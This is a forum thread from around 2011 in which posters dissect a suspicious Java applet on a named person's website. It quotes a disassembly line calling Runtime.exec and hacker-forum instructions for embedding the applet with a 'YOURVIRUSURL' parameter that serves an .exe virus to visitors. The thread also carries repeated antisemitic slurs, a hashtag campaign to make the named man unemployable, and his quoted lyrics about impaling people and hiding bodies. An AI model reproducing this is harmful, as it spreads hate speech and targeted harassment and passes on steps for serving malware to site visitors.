http://beer.weremight.com/forums/showthread.php?8215-Use-Caution-Approaching-FreeMediaProductions.info

They have a java applet on their front page http:// + freemediaproductions.info

It refers to http:// + java.nfshost.com

Not sure what it does, but I downloaded it to a safe machine, and disassembled the Java byte code (yeah, I'm a java programmer. That's 'javap -c Client' after you run 'tar xvf Client.jar' and cd to the right directory, for all you geeks out there).

The disassembly is below.

I don't have to look further than Line 1789 to know this code is *invoking another process on your machine* (that means, trying to break out of your browser and run havoc)


1789: invokevirtual #26; //Method java/lang/Runtime.exec: (Ljava/lang/String; )Ljava/lang/Process;


If you want Daryl to do that, y'all go visit his site.

Executive summary, for non-geeks: The Half-Jew Fucker's *Up to something*.

Visit his site at your own risk. Tip o' the hat to Monster at SI for catching this one.

Notice the oddly named routine: jnf3h9go56n -- which google tells me is also available at pastebin.com (the site used by Anonymous to post things), and some place antiscool.web.com -- looks very suspicious.

... Disassembly at the link.

Looks like Mr #daryl #******* #scriptkiddie has been reading teh warez...


(link to Google cache on the other odd phrase '' in his front webpage):

http://webcache.googleusercontent.com/search?q=cache:LPiUPWKa1zUJ:www.hackforums.net/archive/index.php/thread-1043289.html+AMLMAFOIEA&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com

NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL"

AMLMAFOIEA eh? Well same to you, fucker.


Now open the folder where you saved the file. You'll see you'll have a file and a folder. Rename the file from whatever.htm to index.htm and accept any warning you may get.

Now open up index.htm in notepad. Scroll down to the very bottom of the page, make a new line and add this text:
Code:
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL">
</APPLET>

Replace "YOURVIRUSURL" with the link to your .exe virus.


.exe would seem to be primarily targeting Windows (Microsoft) systems.

His descent into #dontemploydarylbasarab (http://www.google.com/search?q=%23dontemploydarylbasarab&ie=utf-8&oe=utf-8&aq=t) unemployability seems to be palpable now. He's seeding a website, under his IRL name, with known malware.

LOL - he saw this post and took it down. Not that I didn't get the source code of the page I saw, mind you, and not that others didn't witness the attempt.

It was some lame attempt at a keystroke logger. Serous Script Kiddie stuff, pretty much what you would expect from a Half-Jew Bessarabian. Likely not even functional, as one would expect from an IT screw up who can't even hack HTML. Details at the TBB thread.

Silly Commies. Trix are for Rabbis.

I got a pop-up when I visited there recently telling me the site was trying to run a javascript and did I want it to continue. All things considered, I clicked on 'no'.

Would Windows XP allow the applet to download without the user's knowledge? If the applet is a key logger, how would one know if one is infected? Would an antivirus scan detect the applet on a user's computer? (Seems to me that it should.) Does anyone here think that they might have been infected?

Daryl *******, the FMP owner, claims a high volume of traffic to his website. One assumes that much of this volume comes from outside the Circle of Crust. Has he indiscriminantley exposed web surfers to his applet? Is this illegal?

Turn him in to his ISP, the FBI, and anyone else you can think of.
After all, has he not done the same here, at the Queerbarrel, the Phora, and other places?
I think it is your DUTY to turn him in!

Not everyone has a Kane obession, Ive never been to, or even heard of the site....

Good job monster :agree:

Not everyone has a Kane obession

Yet enough do to make it mildly annoying for some of the rest of us.

I have a feeling Kane is one of these types of topics that goes away if people stop talking about it. I also have a feeling certain people aren't going to stop talking about it.

LOL - he saw this post and took it down. Not that I didn't get the source code of the page I saw, mind you, and not that others didn't witness the attempt.

It was some lame attempt at a keystroke logger. Serous Script Kiddie stuff, pretty much what you would expect from a Half-Jew Bessarabian. Likely not even functional, as one would expect from an IT screw up who can't even hack HTML. Details at the TBB thread.

Silly Commies. Trix are for Rabbis.

Can you post the details here?

Can you post the details here?

Kane claims he was just trying to scare somebody and there was no payload. I'm pretty sure it was botched and non-functional, and I don't have a copy of the payload (possibly there was none).

The applet was *intended* to download, without the user's consent, a file of the hacker's choosing, from the same site the applet Client.jar was hosted (java.nfshost.com -- not FMP). Going on the assumption that Kane does *not* control that virtual website and place Client.jar himself (but read about it in some hacker's forum), he would only be able *at most* to download a payload that was hosted there by someone else. The sorts of files that seem to be hosted for this purpose are, a google search will show, either keyloggers or viruses intended to infect. If Kane had chosen to configure the applet to point to a site he controlled, and *if* the applet actually functions as designed (not proven), and *if* the user had a vulnerable machine, with the java plugin, and configured to receive no warnings or chose to ignore them, then in that case the plugin would have delivered its intended payload, and that payload could be any program at all he wished to run on the victim's computer -- no restrictions as to type. The hypothesis the intent was to drop a keylogger is based on (1) the sorts of things people talk about on the net and (2) my assessment of Kane as a threat who is known to want to phish for password. In other words, a creepy peeping tom.

If he chose to misconfigure the applet, then it would give you an annoying message and do nothing. I give zero credence to Kane's claim he intended no harm, and do not know whether the malicious intent failed because he doesn't know how to configure it properly, or whether he is actually telling the truth. I'm willing to believe inept or disingenuous and devious, ahead of considerate and humorous. But that's just me.

What I observed, is the applet, as configured in the news scroll on Kane's front page, had the grey background of an applet drawing area -- meaning the browser parsed the html tag in full, rendered and reserved a space for it, but was unable to activate it. On my machine this would be because I do not in fact have the java plugin installed. Firefox correctly asked me if I wished to install it, and I declined. I don't believe any visitor is likely to have actually run the applet, except for persons who received an 'unable to log in message'.

My reason for believing this is I observed the PARAM configuring the applet was set to a location '../something' -- and I believe the way java applets work is they look at the base url of the jar file, unless you override that (not observed in the source code I saw). Thus, it would have tried to fetch a file from java.nfshost.com -- and I theorize that one level up from what is likely a virtual host is a working directory that is password protected, or throws some sort of error such as was observed.

In other words, I believe the attack (or prank) was misconfigured. So, there are a few possible explanations of the facts: (1) Kane got some script kiddie code to drop a keylogger on his intended victim's target machine but his cut and paste lead to a misconfiguration -- I consider that the likeliest. (2) It was a prank, like he said, and 'he meant to do it' -- deliberately misconfiguring it in an odd way, that is in fact annoying. There is a remote possibility (3) That it was some HTML he posted, and it was only accidentally turned from a CODE ... /CODE tag or something like that, into an actually functioning applet on accident, by the HTML neutering code of his website, in the news scroll. The code itself was interspersed with 'HTML escaping' for proper rendering in the news feed (as it should be), but the code that does that *might* not be that smart about handling an embedded java applet, and accidentally strip out the CODE ... /CODE leaving the APPLET tag now functional by accident [I consider this technically unlikely, but mention it for completeness]. I would discard (3) because Kane hasn't claimed it was an accident. I'd say it's down to 1 or 2 and you are welcome to believe what you like.

Thanks for the explanation, Mac. Well written. Even I understood it. Some of it. :)

.

http://cdn.counter-currents.com/wp-content/uploads/2011/09/Apotheosis.jpg

« Last post by Daryl ******* on September 11, 2011, 01:38:49 am »
i put it down for pennsylvania.
i put it down for transylvania.
goin to impale you from lancaster to philly
drop your bodies in bucks county like my idol richard kuklinski (he really did that),
i was called chester
the molester
as a child.
Go to chester pennsylvania, so I can start to get wild.

« Last post by Daryl ******* on September 14, 2011, 04:07:08 am »
Another particularly good looking county is Bucks County. It's a Philadelphia Suburb but it's a "long commute" suburb. It's probably my favorite suburb, but it's too far out.

Nice forests, trails, and hills.

I have a video where I searched for richard kuklinki's spots where he hid bodies in the forests of bucks county, but I have not released that video for public view.

http://www.freemediaproductions.info/Firezone/index.php?action=recent;start=10...At your own risk, of curse.


.

http://www.serialkillercalendar.com/EVERYPAGE/LEFTHANDNAV/NEW2010SERIALKILLERCALENDARLEFTSIDEBUTTON.jpg